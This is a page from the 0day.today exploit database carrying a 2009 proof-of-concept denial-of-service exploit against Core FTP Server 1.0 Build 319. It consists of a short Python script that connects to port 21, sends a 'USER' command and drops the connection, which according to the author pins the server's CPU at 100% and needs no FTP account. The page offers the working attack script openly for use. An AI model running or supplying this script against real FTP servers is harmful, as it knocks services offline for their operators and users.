[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Core FTP Server 1.0 Build 319 Denial of Service

Author
Mert SARICA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9796
Category
dos / poc
Date add
04-12-2009
Platform
unsorted
===============================================
Core FTP Server 1.0 Build 319 Denial of Service
===============================================

# Title: Core FTP Server 1.0 Build 319 Denial of Service
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mert SARICA
# Published: 2009-12-04
# Verified: yes

view source
print?
# Note: FTP account is not required for exploitation
# http://www.mertsarica.com
# I discovered a denial-of-service vulnerability on Core FTP Server product.
# When you send "USER test\r\n" and then kills the connection
# immediately, cpu increases to 100% and stays at that level until you
# stop the ftp service.
 
 
import socket, sys
 
HOST = 'localhost'   
PORT = 21            
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
    s.connect((HOST, PORT))
except:
    print "Connection error"
    sys.exit(1)
 
try:
    s.send('USER MS\r\n') # magic packet
    s.close()
    print("Very good, young padawan, but you still have much to learn...")
except:
    print "Connection error"
    sys.exit(1)



#  0day.today [2024-12-24]  #